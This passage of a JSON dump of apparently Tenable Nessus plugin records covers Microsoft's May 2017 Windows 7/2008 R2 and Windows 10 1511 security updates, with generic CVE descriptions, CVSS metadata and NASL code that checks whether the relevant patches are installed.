(CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 7 and Windows Server 2008 R2 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0231", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019264.NASL", "href": "https://www.tenable.com/plugins/nessus/100058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100058);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0171\",\n \"CVE-2017-0175\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0222\",\n \"CVE-2017-0231\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98110,\n 98111,\n 98127,\n 98173,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 
98273,\n 98274\n );\n script_xref(name:\"MSKB\", value:\"4019263\");\n script_xref(name:\"MSKB\", value:\"4019264\");\n script_xref(name:\"MSFT\", value:\"MS17-4019263\");\n script_xref(name:\"MSFT\", value:\"MS17-4019264\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 7 and Windows Server 2008 R2 May 2017 Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4019263\nor cumulative update 4019264. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0175)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. 
(CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. 
(CVE-2017-8552)\");\n # https://support.microsoft.com/en-us/help/4019264/windows-7-update-kb4019264\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89dd1a9e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019263 or Cumulative update KB4019264.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft\nbulletin = 'MS17-05';\nkbs = make_list(\"4019264\", \"4019263\");\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB only applies to Windows 7 / 2008 R2, SP1\nif (hotfix_check_sp_range(win7:'1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"05_2017\", bulletin:bulletin, rollup_kb_list:[4019264, 4019263])\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:29", "description": "The remote Windows 10 version 1511 host is missing security update KB4019473. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. 
(CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. 
An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. 
An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019473: Windows 10 Version 1511 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019473.NASL", "href": "https://www.tenable.com/plugins/nessus/100060", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100060);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n 
\"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019473\");\n script_xref(name:\"MSFT\", value:\"MS17-4019473\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019473: Windows 10 Version 1511 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1511 host is missing security update\nKB4019473. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. 
An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. 
